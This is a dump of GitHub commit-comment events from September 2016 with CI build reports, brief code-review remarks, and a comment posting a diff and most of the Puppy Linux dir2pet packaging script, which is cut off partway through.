{"id":"4542580602","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970164,"position":null,"line":null,"path":null,"commit_id":"4ccf543e00b4fa279063abbd6b99fc0ee669b73c","created_at":"2016-09-09T21:42:51Z","updated_at":"2016-09-09T21:42:51Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T21:42:51Z"}
{"id":"4542584491","type":"CommitCommentEvent","actor":{"login":"terrycain"},"repo":{"name":"terrycain/razer-drivers"},"payload":{"comment":{"id":18970169,"position":7,"line":56,"path":"daemon/razer_daemon/dbus_services/dbus_methods/bw2013.py","commit_id":"cb601d55b3e70bf425a5e04f983416f42adec27d","created_at":"2016-09-09T21:43:47Z","updated_at":"2016-09-09T21:43:47Z","body":"Good point. Sorry tired. Fixed for next push"}},"created_at":"2016-09-09T21:43:47Z"}
{"id":"4542592155","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970192,"position":null,"line":null,"path":null,"commit_id":"4ccf543e00b4fa279063abbd6b99fc0ee669b73c","created_at":"2016-09-09T21:45:36Z","updated_at":"2016-09-09T21:45:36Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T21:45:36Z"}
{"id":"4542597617","type":"CommitCommentEvent","actor":{"login":"zen524"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18970208,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-09T21:46:55Z","updated_at":"2016-09-09T21:46:55Z","body":"Make sure you push it first lol. I want to see your process to learn from it.\n\n\n-Eric C. Whitaker\n________________________________\nFrom: Kovee98 <notifications@github.com>\nSent: Thursday, September 8, 2016 3:38:03 PM\nTo: Kovee98/Lab3\nCc: Eric C Whitaker; Author\nSubject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n\nLol, I need to but it's just modifications to read and writefile.cpp\n\nOn Sep 8, 2016 4:26 PM, \"zen524\" <notifications@github.com> wrote:\n\n> You been pushing your code?\n>\n>\n> -Eric C. Whitaker\n> ________________________________\n> From: Kovee98 <notifications@github.com>\n> Sent: Thursday, September 8, 2016 3:23:25 PM\n> To: Kovee98/Lab3\n> Cc: Eric C Whitaker; Author\n> Subject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n>\n>\n> no its all good, man\n>\n> -\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub<https://github.com/\n> Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef7\n> 47ab33c4e3#commitcomment-18953280>, or mute the thread<https://github.com/\n> notifications/unsubscribe-auth/AUWzm129YAkx3A9Uf9oAMcOmUW3q9d\n> 7Wks5qoHzNgaJpZM4J3lly>.\n>\n> -\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18953317>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUWwRGnoOMbSXd5Zq0UIPuzQ9A-nvOEvks5qoH2TgaJpZM4J3lly>\n> .\n>\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18953471>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AUWzmwfjmQSmDK0LkZeDvZO0TR2gjyjqks5qoIA7gaJpZM4J3lly>.\n"}},"created_at":"2016-09-09T21:46:55Z"}
{"id":"4542603084","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970220,"position":null,"line":null,"path":null,"commit_id":"4ee9d8a8129320b38149552781f6d47504e44d15","created_at":"2016-09-09T21:48:15Z","updated_at":"2016-09-09T21:48:15Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T21:48:15Z"}
{"id":"4542606563","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18970232,"position":null,"line":null,"path":null,"commit_id":"33f0223c113045d99fbc7668e4032076a035a5c5","created_at":"2016-09-09T21:49:09Z","updated_at":"2016-09-09T21:49:09Z","body":"indent, localize logging calls, invert if statements. again preparatory changes to code without affecting functionality"}},"created_at":"2016-09-09T21:49:09Z"}
{"id":"4542606605","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18970234,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-09T21:49:10Z","updated_at":"2016-09-09T21:49:10Z","body":"Yeah I will, I'll text you when I push them"}},"created_at":"2016-09-09T21:49:10Z"}
{"id":"4542612601","type":"CommitCommentEvent","actor":{"login":"alexahn"},"repo":{"name":"scoursen/django-softdelete"},"payload":{"comment":{"id":18970253,"position":5,"line":4,"path":"setup.py","commit_id":"1a1ffae1a181dd958fc5fdf3cd6ea933305aba64","created_at":"2016-09-09T21:50:39Z","updated_at":"2016-09-09T21:50:39Z","body":"Shouldn't this be 0.6.0?"}},"created_at":"2016-09-09T21:50:39Z"}
{"id":"4542613658","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18970260,"position":null,"line":null,"path":null,"commit_id":"4ee9d8a8129320b38149552781f6d47504e44d15","created_at":"2016-09-09T21:50:56Z","updated_at":"2016-09-09T21:50:56Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ee9d8a8129320b38149552781f6d47504e44d15-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T21:50:56Z"}
{"id":"4542615809","type":"CommitCommentEvent","actor":{"login":"renatorib"},"repo":{"name":"LeaVerou/prefixfree"},"payload":{"comment":{"id":18970269,"position":null,"line":null,"path":null,"commit_id":"452b0f3d4e902db2e5cead86f5d882b6e25e48a7","created_at":"2016-09-09T21:51:27Z","updated_at":"2016-09-09T21:51:27Z","body":"hey... calm down...\r\n"}},"created_at":"2016-09-09T21:51:27Z"}
{"id":"4542619552","type":"CommitCommentEvent","actor":{"login":"crepererum"},"repo":{"name":"spz-signup/spz-signup"},"payload":{"comment":{"id":18970283,"position":null,"line":null,"path":null,"commit_id":"739a916c0f52c1774e3f9dfc46451bfcdf0ba799","created_at":"2016-09-09T21:52:26Z","updated_at":"2016-09-09T21:52:26Z","body":"@redalertexpert at least the first comma is required here. Otherwise, the following would happen:\r\n\r\n```python\r\nl1 = [\r\n    'foo'\r\n    'bar'\r\n]\r\n\r\nl2 = ['foobar']\r\n\r\nassert(l1 == l2)\r\n```\r\n\r\nThe config file is actual Python code (in case you were wondering about its construction)."}},"created_at":"2016-09-09T21:52:26Z"}
{"id":"4542619720","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18970285,"position":null,"line":null,"path":null,"commit_id":"03cb67f94da297ea4bab82c44df5ef32d977252e","created_at":"2016-09-09T21:52:29Z","updated_at":"2016-09-09T21:52:29Z","body":"use callbacks to ensure that things happen in this order\r\n\r\n1. the owner Pico is created and makes available its ECI\r\n2. the io.picolabs.pico ruleset is registered (TODO go past that and install it)\r\n3. the io.picolabs.visual_params ruleset is registered (TODO ditto)\r\n\r\nnext steps will be\r\n\r\n1. fully install the rulesets\r\n2. using the ECI and each ruleset, fully automate remaining bootstrap steps"}},"created_at":"2016-09-09T21:52:29Z"}
{"id":"4542621999","type":"CommitCommentEvent","actor":{"login":"rb8888"},"repo":{"name":"rb8888/udemyGoIntroCourse"},"payload":{"comment":{"id":18970291,"position":null,"line":null,"path":null,"commit_id":"c1350c18d3c660c8ea891cc776d0a08354dee0e5","created_at":"2016-09-09T21:53:06Z","updated_at":"2016-09-09T21:53:06Z","body":"My answer for the exercise from https://tour.golang.org/moretypes/23"}},"created_at":"2016-09-09T21:53:06Z"}
{"id":"4542631140","type":"CommitCommentEvent","actor":{"login":"almamun2227"},"repo":{"name":"almamun2227/GEICO"},"payload":{"comment":{"id":18970314,"position":null,"line":null,"path":null,"commit_id":"1fd4bf5e5ecdbc85bf2ef0d433fa2e04009bd46f","created_at":"2016-09-09T21:55:25Z","updated_at":"2016-09-09T21:55:25Z","body":"it's good"}},"created_at":"2016-09-09T21:55:25Z"}
{"id":"4542638698","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":18970343,"position":null,"line":null,"path":null,"commit_id":"6c1199d4e145c028ac192064bda623e8d5e0712d","created_at":"2016-09-09T21:57:14Z","updated_at":"2016-09-09T21:57:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Xp3k0TjtRBWhKddGyuYZuQ"}},"created_at":"2016-09-09T21:57:14Z"}
{"id":"4542650268","type":"CommitCommentEvent","actor":{"login":"dstufft"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18970375,"position":119,"line":2152,"path":"Doc/library/ssl.rst","commit_id":"6ffd11d3910e73fa3093a2136859fc3f7196996e","created_at":"2016-09-09T22:00:02Z","updated_at":"2016-09-09T22:00:02Z","body":"We don't need to do this stuff anymore right? ``ssl.SSLContext()`` does the right thing by default now?"}},"created_at":"2016-09-09T22:00:02Z"}
{"id":"4542651899","type":"CommitCommentEvent","actor":{"login":"AndreiIlinca"},"repo":{"name":"AndreiIlinca/Total-beginner-versions"},"payload":{"comment":{"id":18970377,"position":1,"line":null,"path":"README.md","commit_id":"2bb34431d7d2c9673755306fecfd769d27a15a8e","created_at":"2016-09-09T22:00:24Z","updated_at":"2016-09-09T22:00:24Z","body":"This is one folder where I will upload my beginner versions of different small programs\nI will save them as I advance in Python, at least as a reminder when I look back to know where I started from.\nShould I discover new ways and better ways to re write a certain program, I will come back to it and insert the updated version"}},"created_at":"2016-09-09T22:00:24Z"}
{"id":"4542661757","type":"CommitCommentEvent","actor":{"login":"dstufft"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18970406,"position":34,"line":374,"path":"Lib/ssl.py","commit_id":"6ffd11d3910e73fa3093a2136859fc3f7196996e","created_at":"2016-09-09T22:02:40Z","updated_at":"2016-09-09T22:02:40Z","body":"It looks like Python 3.5 has ``PROTOCOL_TLS`` and it uses it by default. This will be a breaking change right? It will break ``ssl.SSLContext()`` without an explicit protocol."}},"created_at":"2016-09-09T22:02:40Z"}
{"id":"4542663573","type":"CommitCommentEvent","actor":{"login":"Piruzzolo"},"repo":{"name":"Piruzzolo/Mathics"},"payload":{"comment":{"id":18970411,"position":8,"line":207,"path":"mathics/builtin/graphics.py","commit_id":"dcfeecd906ee5183912feb9576f9a8cbf45322ea","created_at":"2016-09-09T22:03:02Z","updated_at":"2016-09-09T22:03:02Z","body":"here I fixed the order of the arguments"}},"created_at":"2016-09-09T22:03:02Z"}
{"id":"4542671456","type":"CommitCommentEvent","actor":{"login":"kbtorun"},"repo":{"name":"kbtorun/smartlua"},"payload":{"comment":{"id":18970429,"position":1,"line":1,"path":"README.md","commit_id":"8a61ea2e480f53455623e1bd5245817bc3a9b299","created_at":"2016-09-09T22:04:56Z","updated_at":"2016-09-09T22:04:56Z","body":"testyy"}},"created_at":"2016-09-09T22:04:56Z"}
{"id":"4542680228","type":"CommitCommentEvent","actor":{"login":"KINGSDOMAIN"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":18970460,"position":null,"line":null,"path":null,"commit_id":"edefe0e77a39149f971c4215301f7f8a7f15f210","created_at":"2016-09-09T22:07:05Z","updated_at":"2016-09-09T22:07:05Z","body":"gello github ...i luv u guys"}},"created_at":"2016-09-09T22:07:05Z"}
{"id":"4542681693","type":"CommitCommentEvent","actor":{"login":"gothwski"},"repo":{"name":"makingdevs/MyBarista"},"payload":{"comment":{"id":18970467,"position":null,"line":null,"path":null,"commit_id":"8767669f1d07e5c58139fed111658793e1b6baa3","created_at":"2016-09-09T22:07:30Z","updated_at":"2016-09-09T22:07:30Z","body":"Tenemos un problema aquí, en el caso `FetchCommentsSucces` del branch yo necesito actualizar los comentarios del modelo Checkin y para ello necesito tenerlo disponible en el `Union Type` como parámetro. Hasta donde he leído ejemplos de código no me he encontrado con tener que pasar un segundo parámetro en un `Msg` que desempeña la tarea de un request, y que este sea pueda ser `Maybe`. Podemos buscar la manera pero definitivamente tendremos que ignorar un poco la arquitectura de Elm o alterar el diseño de la API."}},"created_at":"2016-09-09T22:07:30Z"}
{"id":"4542683885","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_Settings"},"payload":{"comment":{"id":18970477,"position":4,"line":102,"path":"src/com/android/settings/DeviceInfoSettings.java","commit_id":"7906e85eba7f19809200c8072fa93bb84170315a","created_at":"2016-09-09T22:08:07Z","updated_at":"2016-09-09T22:08:07Z","body":"durp typo thanks I will fix"}},"created_at":"2016-09-09T22:08:07Z"}
{"id":"4542684363","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18970480,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T22:08:13Z","updated_at":"2016-09-09T22:08:13Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-09T22:08:13Z"}
{"id":"4542684763","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18970482,"position":124,"line":176,"path":"woof-code/rootfs-skeleton/usr/bin/dir2pet","commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-09T22:08:18Z","updated_at":"2016-09-09T22:08:18Z","body":"Hi Richard,\r\n\r\nOk, I have left default at gzip but have added a new option with help (in the Basic section).\r\n\r\nI'll post a diff and the full script for perusal. I think this is a good outcome.\r\n\r\nThe diff:\r\n```diff\r\n--- /initrd/pup_ro2/usr/bin/dir2pet\t2016-09-04 13:55:21.000000000 +1000\r\n+++ /usr/bin/dir2pet\t2016-09-10 08:06:57.964770477 +1000\r\n@@ -20,6 +20,32 @@\r\n #160524 rerwin: correct search for top category in hierarchy.\r\n #160803 rerwin: correct pet.specs path; sync compression default; simplify parameter parsing\r\n \r\n+comp=gz # default at first run\r\n+[ -f \"$HOME/.dir2pet.cfg\" ] && . $HOME/.dir2pet.cfg\r\n+\r\n+# set default compression\r\n+set_comp() {\r\n+\techo \"Please set your default compresion.\"\r\n+\techo \"Compression determines the size of the end package. 'xz' is\"\r\n+\techo \"smaller but is slower to decompress whereas 'gz' is the\"\r\n+\techo \"opposite. If you have a slow old machine we reccommend 'gz'\"\r\n+\techo \"however if you have a faster machine 'xz' is probably a\"\r\n+\techo \"better choice. If you don't know it will be safe just to press\"\r\n+\techo \"'Enter'.\"\r\n+\techo\r\n+\techo \"Press 'Enter' to use the current $comp compression or press\"\r\n+\techo \"any prinatble key character and 'Enter' to change.\"\r\n+\r\n+\tcase $comp in\r\n+\t\txz)newcomp=gz;;\r\n+\t\tgz)newcomp=xz;;\r\n+\tesac\r\n+\tread setcomp\r\n+\t[ -z \"$setcomp\" ] && echo \"comp=$comp\" > $HOME/.dir2pet.cfg ||\\\r\n+\techo \"comp=$newcomp\" > $HOME/.dir2pet.cfg\r\n+\texit 0\r\n+}\r\n+\r\n usage() {\r\n \techo '\r\n Usage: dir2pet [option]... [<name-of-dir>]\r\n@@ -35,9 +61,13 @@\r\n   <name-of-dir>\tthe directory, not path, to be packaged.\r\n                 THIS IS THE PACKAGE.\r\n                 (Omit if specified with -p option)\r\n-\r\n-EXAMPLE:\r\n-# dir2pet my_fun_game-0.1-i486\r\n+                \r\n+      EXAMPLE:\r\n+      # dir2pet my_fun_game-0.1-i486\r\n+\r\n+  set-comp      Use this to set or change the default compression\r\n+                between \"gz\" and \"xz\".\r\n+                The current default is '$comp'\r\n \r\n --------------------------------------------------------------------\r\n \r\n@@ -77,10 +107,6 @@\r\n ' #160803\r\n }\r\n \r\n-comp=gz #default - change only this to set new deault. #160803\r\n-arch=`uname -m` #160803\r\n-[ \"${arch:0:3}\" = \"arm\" ] && comp=gz #160803\r\n-\r\n #parameters\r\n while [ $# -gt 0 ]; do #160803\r\n \tcase $1 in\r\n@@ -91,6 +117,7 @@\r\n \t\t-d=*) deps=`echo $1|cut -d '=' -f2`;;\r\n \t\t-c=*) category=`echo $1|cut -d '=' -f2`;;\r\n \t\t-p=*) directory=`echo $1|cut -d '=' -f2`;;\r\n+\t\tset-comp) set_comp;;\r\n \t\t[a-zA-Z]*)dir=$1;; #160803\r\n \t\t-h|--help|\"\") usage; exit;;\r\n \t\t*) echo \"Invalid argument: $1\"; usage; exit;;\r\n@@ -177,8 +204,10 @@\r\n \techo\r\n \techo \"If any of the above needs to be further sorted out, you can quit this\"\r\n \techo \"script right now by pressing CTRL-C, otherwise just press ENTER\"\r\n-\tdefault=xz char=\"g\" other=gzip\r\n-\t[ \"$comp\" = \"gz\" ] && default=gzip char=\"x\" other=xz #160803\r\n+\tcase $comp in\r\n+\t\txz)default=xz char=\"g\" other=gzip;;\r\n+\t\tgz)default=gzip char=\"x\" other=xz;;\r\n+\tesac\r\n \techo \"to use the default \\\"$default\\\" compression or \\\"$char\\\" then ENTER for \"\r\n \techo \"\\\"$other\\\" compression.\"\r\n \techo -n \"Press ENTER key or \\\"$char\\\" and ENTER to continue: \"\r\n```\r\n\r\nThe revised script\r\n\r\n```bash\r\n#!/bin/sh\r\n#Barry Kauler (c) Copyight 2007,2009 www.puppylinux.com\r\n#2007 Lesser GPL licence v2 (http://www.fsf.org/licensing/licenses/lgpl.html)\r\n#This script will create a PET package.\r\n#Just create a directory with the name of the package, for example 'abiword-0.5.6'\r\n#and put what you want in it.\r\n#It should have abiword-0.5.6/usr/share/applications/abiword.desktop if the \r\n#application requires a menu entry, but if there isn't one this script will ask\r\n#some simple questions and create one.\r\n#This script will also create abiword-0.5.6/pet.specs, which has\r\n#some information useful to the Puppy Package Manager.\r\n#w476, w478 fixes to work with petspec.\r\n#w482 if preexisting pet.specs, read fields from it.\r\n#100201 improve reading of pet.specs\r\n#100303 fix bug detection arch-dependent pkg.\r\n#130305 rerwin: ensure package tmp directory, if any, has all permissions.\r\n#131122 support xz compressed pets (see installpkg.sh, pet2tgz)\r\n#131123 changed default to gzip, will change it back in a year or 2\r\n#141011 add command line args for unattended builds\r\n#160524 rerwin: correct search for top category in hierarchy.\r\n#160803 rerwin: correct pet.specs path; sync compression default; simplify parameter parsing\r\n\r\ncomp=gz # default at first run\r\n[ -f \"$HOME/.dir2pet.cfg\" ] && . $HOME/.dir2pet.cfg\r\n\r\n# set default compression\r\nset_comp() {\r\n\techo \"Please set your default compresion.\"\r\n\techo \"Compression determines the size of the end package. 'xz' is\"\r\n\techo \"smaller but is slower to decompress whereas 'gz' is the\"\r\n\techo \"opposite. If you have a slow old machine we reccommend 'gz'\"\r\n\techo \"however if you have a faster machine 'xz' is probably a\"\r\n\techo \"better choice. If you don't know it will be safe just to press\"\r\n\techo \"'Enter'.\"\r\n\techo\r\n\techo \"Press 'Enter' to use the current $comp compression or press\"\r\n\techo \"any prinatble key character and 'Enter' to change.\"\r\n\r\n\tcase $comp in\r\n\t\txz)newcomp=gz;;\r\n\t\tgz)newcomp=xz;;\r\n\tesac\r\n\tread setcomp\r\n\t[ -z \"$setcomp\" ] && echo \"comp=$comp\" > $HOME/.dir2pet.cfg ||\\\r\n\techo \"comp=$newcomp\" > $HOME/.dir2pet.cfg\r\n\texit 0\r\n}\r\n\r\nusage() {\r\n\techo '\r\nUsage: dir2pet [option]... [<name-of-dir>]\r\n  \r\nCreate a compressed file containing the content of a directory\r\n\r\nOptions:\r\n  -h|--help    show this help\r\n  \r\n--------------------------------------------------------------------\r\n  \r\nBasic:\r\n  <name-of-dir>\tthe directory, not path, to be packaged.\r\n                THIS IS THE PACKAGE.\r\n                (Omit if specified with -p option)\r\n                \r\n      EXAMPLE:\r\n      # dir2pet my_fun_game-0.1-i486\r\n\r\n  set-comp      Use this to set or change the default compression\r\n                between \"gz\" and \"xz\".\r\n                The current default is '$comp'\r\n\r\n--------------------------------------------------------------------\r\n\r\nAdvanced:  \r\n  -s\tskip all questions - useful for package build scripts\r\n  -p=<name-of-dir>  directory to be packaged. THIS IS THE PACKAGE.\r\n  \r\nTHE following options are only useful with the \"-s\" option.\r\nFor best results, use as many as possible: \r\n' #160803\r\n\techo \"Compression: (only use one, default if none chosen is \\\"$comp\\\")\" #160803\r\n\techo '  -x    use xz (high) compression\r\n  -g\tuse gz (low) compression\r\n  \r\nNon-compulsory:\r\n  -w=\"<description>\"  quoted description of the application\"\r\n  -d=<+deps>  comma-delimited dependencies, with prepended \"+\" sign\r\n  -c=<Category>  category of application; for package manager\r\n  \r\nLIST of allowed Categories: (default: BuildingBlock)\r\n\tDesktop\r\n\tSystem\r\n\tSetup\r\n\tUtility\r\n\tFilesystem\r\n\tGraphic\r\n\tDocument\r\n\tBusiness\r\n\tPersonal\r\n\tNetwork\r\n\tInternet\r\n\tMultimedia\r\n\tFun\r\n\r\nEXAMPLE\r\n# dir2pet -x -s -w=\"fun game\" -d=+gtk+,+ffmpeg,+cairo -p=my_fun_game-0.1-i486\r\n' #160803\r\n}\r\n\r\n#parameters\r\nwhile [ $# -gt 0 ]; do #160803\r\n\tcase $1 in\r\n\t\t-x) comp=xz ;;\r\n\t\t-g) comp=gz ;;\r\n\t\t-s) skip=1 ;;\r\n\t\t-w=*) desc=\"`echo \"$1\"|cut -d '=' -f2`\" ;;\r\n\t\t-d=*) deps=`echo $1|cut -d '=' -f2`;;\r\n\t\t-c=*) category=`echo $1|cut -d '=' -f2`;;\r\n\t\t-p=*) directory=`echo $1|cut -d '=' -f2`;;\r\n\t\tset-comp) set_comp;;\r\n\t\t[a-zA-Z]*)dir=$1;; #160803\r\n\t\t-h|--help|\"\") usage; exit;;\r\n\t\t*) echo \"Invalid argument: $1\"; usage; exit;;\r\n\tesac\r\n\tshift #also decrements $# 160803\r\ndone\r\n\r\nISDIR=$dir\r\n[ -z \"$ISDIR\" ] && dir=$directory\r\n\r\nif [ ! -d \"$dir\" ];then\r\n usage\r\n exit\r\nfi\r\n\r\nADIR=$dir\r\nMYPID=${$}\r\n\r\n#split ADIR path/filename into components...\r\nBASEPKG=\"`basename $ADIR`\"\r\nDIRPKG=\"`dirname $ADIR`\"\r\n[ \"$DIRPKG\" = \"/\" ] && DIRPKG=\"\"\r\n\r\n#w482 directory may already have a pet.specs, reuse it...\r\nNAMEONLY=\"\"\r\nPUPMENUDESCR=\"\"\r\nPUPOFFICIALDEPS=\"\"\r\nPUPCATEGORY=\"\"\r\nPUPPATH=\"\" #100201\r\nARCHDEPENDENT=\"yes\" #100201\r\nDEFREPO=\"\" #100201\r\nif [ -f $DIRPKG/$BASEPKG/pet.specs ];then #160803\r\n #new: pkgname|nameonly|version|pkgrelease|category|size|path|fullfilename|dependencies|description|\r\n #optionally on the end: compileddistro|compiledrelease|repo| (fields 11,12,13)\r\n PETSPECS=\"`cat $DIRPKG/$BASEPKG/pet.specs | head -n 1`\" #160803\r\n DB_pkgname=\"`echo -n \"$PETSPECS\" | cut -f 1 -d '|'`\"\r\n DB_nameonly=\"`echo -n \"$PETSPECS\" | cut -f 2 -d '|'`\"\r\n NAMEONLY=\"$DB_nameonly\"\r\n DB_version=\"`echo -n \"$PETSPECS\" | cut -f 3 -d '|'`\"\r\n DB_pkgrelease=\"`echo -n \"$PETSPECS\" | cut -f 4 -d '|'`\"\r\n DB_category=\"`echo -n \"$PETSPECS\" | cut -f 5 -d '|'`\"\r\n PUPCATEGORY=\"$DB_category\"\r\n DB_size=\"`echo -n \"$PETSPECS\" | cut -f 6 -d '|'`\"\r\n DB_path=\"`echo -n \"$PETSPECS\" | cut -f 7 -d '|'`\"\r\n PUPPATH=\"$DB_path\" #100201\r\n DB_fullfilename=\"`echo -n \"$PETSPECS\" | cut -f 8 -d '|'`\"\r\n DB_dependencies=\"`echo -n \"$PETSPECS\" | cut -f 9 -d '|'`\"\r\n PUPOFFICIALDEPS=\"$DB_dependencies\"\r\n DB_description=\"`echo -n \"$PETSPECS\" | cut -f 10 -d '|'`\"\r\n PUPMENUDESCR=\"$DB_description\"\r\n DB_compileddistro=\"`echo -n \"$PETSPECS\" | cut -f 11 -d '|'`\"\r\n DB_compiledrelease=\"`echo -n \"$PETSPECS\" | cut -f 12 -d '|'`\"\r\n ARCHDEPENDENT=\"${DB_compileddistro}|${DB_compiledrelease}\"\r\n DB_repo=\"`echo -n \"$PETSPECS\" | cut -f 13 -d '|'`\"\r\n DEFREPO=\"$DB_repo\"\r\nfi\r\n\r\n#difficult task, separate package name from version part... \r\n#not perfect, some start with non-numeric version info...\r\n[ \"$NAMEONLY\" = \"\" ] && NAMEONLY=\"`echo -n \"$BASEPKG\" | sed -e 's/\\-[0-9].*$//g'`\"\r\n#...if that fails, do it the old way...\r\n[ \"$NAMEONLY\" = \"$BASEPKG\" ] && NAMEONLY=\"`echo \"$BASEPKG\" | cut -f 1 -d \"-\"`\"\r\n\r\n# comp\r\nif [ \"$skip\" != 1 ];then\r\nclear\r\n\techo \"Welcome to the 'dir2pet' script.\"\r\n\techo \"This will convert a directory into a PET package. Example, you have a \"\r\n\techo \"directory named 'abiword-0.5.6' and inside that you place whatever is\"\r\n\techo \"needed for the package, for example usr/local/bin/abiword (the executable)\"\r\n\techo \"and usr/share/applications/abiword.desktop (the XDG menu file).\"\r\n\techo \"Whatever the packages needs, though don't worry if there is no .desktop\"\r\n\techo \"file as this script will ask some simple questions and optionally create\"\r\n\techo \"one. The package only needs a .desktop file if a menu entry is to be\"\r\n\techo \"created, and also an icon is required for the menu.\"\r\n\techo\r\n\techo \"The directory $BASEPKG must separate name of the package and\"\r\n\techo \"version number with a dash. Ex: abiword-0.5.6\"\r\n\techo\r\n\techo \"The package may optionally have post-install and post-remove scripts,\"\r\n\techo \"named 'pinstall.sh' and 'puninstall.sh' placed at the top directory.\"\r\n\techo \"(to create official PETs for the Unleashed suite, see its README file\"\r\n\techo 